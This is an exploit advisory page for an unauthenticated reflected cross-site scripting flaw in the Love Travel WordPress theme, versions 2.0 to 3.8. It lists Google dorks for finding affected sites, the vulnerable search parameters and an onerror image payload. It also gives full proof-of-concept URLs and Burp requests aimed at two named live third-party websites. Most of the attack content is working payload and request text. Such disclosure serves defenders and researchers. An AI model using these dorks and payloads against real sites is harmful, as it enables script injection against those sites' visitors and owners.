Love Travel WordPress theme v3.8 - Unauthenticated Reflected XSS

2020.11.10
ru Ex.Mi (RU) ru
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

[+] :: Exploit Title: Love Travel WordPress theme v3.8 - Unauthenticated Reflected XSS [+] :: Google Dork #1: inurl:/wp-content/themes/lovetravel/ [+] :: Google Dork #2: inurl:/wp-content/themes/lovetravel-child/ [+] :: Date: 2020-09-09 [+] :: Exploit Author: Ex.Mi [ https://ex-mi.ru ] [+] :: Vendor: Nicdark [ http://www.nicdarkthemes.com ] [+] :: Software Version: 3.8 [+] :: Software Link: https://themeforest.net/item/love-travel-creative-travel-agency-wordpress/7704831 [+] :: Tested on: Kali Linux [+] :: CVE: [+] :: CWE: CWE-79 [i] :: Info: An Unauthenticated Reflected XSS vulnerability was discovered in the Love Travel theme for WordPress, affected versions: 2.0-3.8. Vulnerable parameters: keyword, date_from, date_to, price_from_to, nicdark_price_from, nicdark_price_to. [$] :: Payload: "><img src=x onerror=alert(`Ex.Mi`);alert(document.domain);> [!] :: PoC #1: https://www.mysunsea.net/packages/?advsearch=true&posttype=packages&keyword=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(%60Ex.Mi%60)%3Balert(document.domain)%3B%3E&tax-0=visibilita&visibilita=evidenza-in-homepage&tax-1=categoria&categoria=grecia&tax-2=strutture&strutture=grecia&tax-3=destination-package&destination-package=cefalonia&tax-4=typology-package&typology-package=combo&tax-5=duration-package&duration-package=&tax-6=person-package&person-package=&date_from=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(%60Ex.Mi%60)%3Balert(document.domain)%3B%3E&date_to=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(%60Ex.Mi%60)%3Balert(document.domain)%3B%3E&price_from_to=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(%60Ex.Mi%60)%3Balert(document.domain)%3B%3E&qnt-taxonomies=7&nicdark_price_from=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(%60Ex.Mi%60)%3Balert(document.domain)%3B%3E&nicdark_price_to=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(%60Ex.Mi%60)%3Balert(document.domain)%3B%3E [!] :: PoC #1 (Burp Suite): GET /packages/?advsearch=true&posttype=packages&keyword=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(%60Ex.Mi%60)%3Balert(document.domain)%3B%3E&tax-0=visibilita&visibilita=evidenza-in-homepage&tax-1=categoria&categoria=grecia&tax-2=strutture&strutture=grecia&tax-3=destination-package&destination-package=cefalonia&tax-4=typology-package&typology-package=combo&tax-5=duration-package&duration-package=&tax-6=person-package&person-package=&date_from=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(%60Ex.Mi%60)%3Balert(document.domain)%3B%3E&date_to=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(%60Ex.Mi%60)%3Balert(document.domain)%3B%3E&price_from_to=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(%60Ex.Mi%60)%3Balert(document.domain)%3B%3E&qnt-taxonomies=7&nicdark_price_from=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(%60Ex.Mi%60)%3Balert(document.domain)%3B%3E&nicdark_price_to=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(%60Ex.Mi%60)%3Balert(document.domain)%3B%3E HTTP/1.1 Host: www.mysunsea.net [!] :: PoC #2: http://www.polynesievoyages.pf/blog/packages/?advsearch=true&posttype=&keyword=%22%3E%3Cimg%20src=x%20onerror=alert(`Ex.Mi`);alert(document.domain);%3E&tax-0=&destination-package=&tax-1=typology-package&typology-package=&tax-2=duration-package&duration-package=&tax-3=person-package&person-package=&date_from=&date_to=&price_from_to=&qnt-taxonomies=4 [!] :: PoC #2 (Burp Suite): GET /blog/packages/?advsearch=true&posttype=&keyword=%22%3E%3Cimg%20src=x%20onerror=alert(`Ex.Mi`);alert(document.domain);%3E&tax-0=&destination-package=&tax-1=typology-package&typology-package=&tax-2=duration-package&duration-package=&tax-3=person-package&person-package=&date_from=&date_to=&price_from_to=&qnt-taxonomies=4 HTTP/1.1 Host: www.polynesievoyages.pf [@] :: Contacts: Website: ex-mi.ru Telegram: @ex_mi GitHub: @ex-mi Medium: @ex-mi

References:

https://ex-mi.ru/exploit/[2020-09-09]-[WordPress]-love-travel-theme-v3.8.txt
https://github.com/ex-mi/ex-mi.github.io/tree/main/exploit
https://themeforest.net/item/love-travel-creative-travel-agency-wordpress/7704831


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top